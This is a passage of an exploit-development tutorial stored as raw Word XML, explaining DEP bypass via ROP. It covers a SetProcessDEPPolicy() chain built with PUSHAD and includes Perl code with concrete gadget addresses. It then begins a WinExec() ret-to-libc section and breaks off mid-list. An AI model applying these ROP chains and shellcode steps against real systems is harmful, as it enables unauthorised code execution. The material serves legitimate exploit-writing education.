      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Good exercise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Just to prove that it works :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4619625" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="Image38" descr="">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a:hlinkClick r:id="rId115"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4619625" cy="1800225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="ropversion3"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr/>
        <w:t>Direct RET – ROP Version 3 – SetProcessDEPPolicy()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Another way to bypass DEP would be to use a call to SetProcessDEPPolicy(), basically turning off DEP for the process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function needs 2 parameters on the stack : a pointer to the shellcode (dynamically generated), and zero.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Since we only have a limited number of parameters, I’ll try to use a different technique to put the parameters on the stack… PUSHAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A pushad instruction will put the registers onto the stack. When the registers are pushed onto the stack (pushad), then this is how the top of the stack will look like :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EDI </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ESI </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EBP </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">value pointing to stack right after this block </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EBX </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EDX </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ECX </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EAX </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">That means that, if we position our nops/shellcode right after this block, then perhaps we can take advantage of the fact that we’ll have a value on the stack that points to our shellcode "auto magically". </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, the pushad will take the value off the top of the stack (value that can be manipulated using EDI) and put that in EIP. So that provides us with the perfect path to make this work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to put the right parameters in the right place, we have to craft the registers with the following values :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EDI = pointer to RET (slide to next instruction : rop nop) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ESI = pointer to RET (slide to next instruction : rop nop) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EBP = pointer to SetProcessDEPPolicy() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EBX = pointer to zero </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EDX, ECX and EAX don’t really matter </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After the pushad, the stack will look like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">RET (taken from EDI) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">RET (taken from ESI) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SetProcessDEPPolicy()   (taken from EBP) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Pointer to shellcode (auto magically inserted by pushad) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Zero  (taken from EBX) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EDX (junk) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ECX (junk) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EAX (junk) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">nops </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">shellcode </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The rop chain to do this might look something like this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$eip=pack('V',0x100102DC); #return to stack</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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate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#put zero in EBX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$rop=pack('V',0x100109EC);  #POP EBX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$rop=$rop.pack('V',0xFFFFFFFF);  #&lt;- will be put in EBX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$rop=$rop.pack('V',0x1001C1A5); #INC EBX, EBX = 0 now</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$rop=$rop.pack('V',0x10014F75); #POP EBP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$rop=$rop.pack('V',0x7C8622A4);  #&lt;- SetProcessDEPPolicy, into EBP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#put RET in EDI (needed as NOP)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$rop=$rop.pack('V',0x1001C07F); #POP EDI (pointer to RET)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$rop=$rop.pack('V',0x1001C080); #RET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#put RET in ESI as well (NOP again)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$rop=$rop.pack('V',0x10010C31); #POP ESI</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$rop=$rop.pack('V',0x1001C080); #RET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$rop=$rop.pack('V',0x100184FA);  #PUSHAD</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#ESP will now automagically point at nops</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(Just append nops + shellcode to this rop chain and you’re all set)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4038600" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="Image39" descr="">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a:hlinkClick r:id="rId117"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4038600" cy="1771650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="ropversion4"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr/>
        <w:t>Direct RET – ROP Version 4 – ret-to-libc : WinExec()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So far, I have explained a few ways to bypass DEP, using specific Windows functions. In every case, the real challenge behind the technique is to find reliable ROP gadgets that will craft your stack and call the function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>I think it’s important to note that a "classic" ret-to-libc – style method (using WinExec() for example) might still be a valuable technique as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>While putting together the stack to make a successful call to WinExec() will require some ROP, it is still different from the other DEP bypass techniques, because we are not going to execute custom shellcode. So we don’t really need to change execution flags or disable DEP. We just are going to call a windows function and use a pointer to a series of OS commands as a parameter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId118">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/ms687393(VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>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UINT WINAPI WinExec(</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LPCSTR lpCmdLine,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__in  UINT uCmdShow</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">First argument is a pointer to the command to execute, and the second parameter indicates the window </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>. Some examples :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0 = Hide window </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1 = Show normal </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">10 = Show default </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">11 = Force minimize </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to make this one work, you will need to add a return address to the parameters (first parameter to be precise). This can just be any address, but there has to be something in that field. So, this is what the stack should look like</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">return address </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
